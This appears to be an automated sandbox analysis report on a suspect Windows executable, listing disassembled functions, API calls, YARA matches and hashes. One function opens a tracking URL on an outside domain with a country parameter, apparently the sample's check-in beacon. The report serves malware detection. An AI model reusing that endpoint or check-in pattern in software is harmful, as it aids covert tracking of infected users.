                                                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                                      • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                                                                      Function 024C2E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2E8E
                                                                                                                                                                                                                                                                                        • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1328
                                                                                                                                                                                                                                                                                        • Part of subcall function 024C1321: _wcslen.LIBCMT ref: 024C1344
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024C30A1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                                                      • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                                      • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                                                      • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                                      • Instruction ID: f05beb3b11f4c0e47bf741c133908e9299e3723d66f157796b0292566a97524b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E515195E55344A8E320EFB0BC45B722378EF58712F10643BD518CB2B2E7A19984875E
                                                                                                                                                                                                                                                                                      Function 024E8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 024E896A
                                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 024E8A23
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: fB$csm
                                                                                                                                                                                                                                                                                      • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                                      • Instruction ID: 2b22da791d5a1038650e9ea005772fa76e1e40a14662d232c12186aae9164693
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85410A30E00248DBDF10DF29C884AAE7BB5BF45329F14819BD9165B3A1D732D905CF91
                                                                                                                                                                                                                                                                                      Function 024EF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AZCFTWko2q.exe,00000104), ref: 024EF9BA
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024EFA85
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024EFA8F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                      • API String ID: 2506810119-1634012891
                                                                                                                                                                                                                                                                                      • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                                      • Instruction ID: eed9d8da3458f827b679989f76b2a02d92141da3ab53bd442370fc2d1ad8dee6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF319171A00258EFEF21DF95DC80D9EBBFCEF89711B1140ABE8069B611D7709A44CB90
                                                                                                                                                                                                                                                                                      Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AZCFTWko2q.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                      • API String ID: 2506810119-1634012891
                                                                                                                                                                                                                                                                                      • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                                      • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                                                                      Function 024CC87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024CC8DE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                      • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                                                      • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                                      • Instruction ID: 4252017ded8726e170fee71175b1785dce1c3a3aaddb5bbf7a51625ffce3b299
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2F08B728042086ACB80E55CCD81BEB33989B01302F24802FDD0AAB182EB689946CBB0
                                                                                                                                                                                                                                                                                      Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                                      • String ID: F(@
                                                                                                                                                                                                                                                                                      • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                                      • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                                                                      Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                                                                      • String ID: F(@
                                                                                                                                                                                                                                                                                      • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                                                                      • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                                      • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                                                                                                                                                                                                                                                      Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pScheduler
                                                                                                                                                                                                                                                                                      • API String ID: 1381464787-923244539
                                                                                                                                                                                                                                                                                      • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                                      • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                                                                                                                                                                                                                                                      Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pContext
                                                                                                                                                                                                                                                                                      • API String ID: 1990795212-2046700901
                                                                                                                                                                                                                                                                                      • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                                      • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                                                                                                                                                                                                                                                      Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0042E069
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                                                      • String ID: B
                                                                                                                                                                                                                                                                                      • API String ID: 621396759-3071617958
                                                                                                                                                                                                                                                                                      • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                                      • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                                                                                                                                                                                                                                                      Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pScheduler$version
                                                                                                                                                                                                                                                                                      • API String ID: 1687795959-3154422776
                                                                                                                                                                                                                                                                                      • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                                      • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                                                                                                                                                                                                                                                      Function 024F5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                                      • Instruction ID: f894a45ef626dd1adfb82ee4a64b7b95086c45a33f7f4bc7b5ae4f5ad488d0db
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7A169729017869FE765CF18C8847AFBBE1EF92354F58816FD6859B381C3348942CB51
                                                                                                                                                                                                                                                                                      Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                                      • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                                                                                                                                                                                                                                                      Function 024FFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                                      • Instruction ID: fe7958175614dcaeddd9998412e9dc69700130642446567cac0f93f24014a17f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A413E33A002156BFBA46FB98C44BBF3A66EFC1730F16065BF72AD66D0DB3444458A61
                                                                                                                                                                                                                                                                                      Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                                      • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                                                                                                                                                                                                                                                      Function 024F6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024F047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024F6B51
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024F6BDA
                                                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024F6BEC
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 024F6BF5
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                                                                                                                                                                                                                                                      • Instruction ID: bde06e3fe233c29f72e09ac2985bca0aebc39ba2660dc752e23c683269eaf794
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
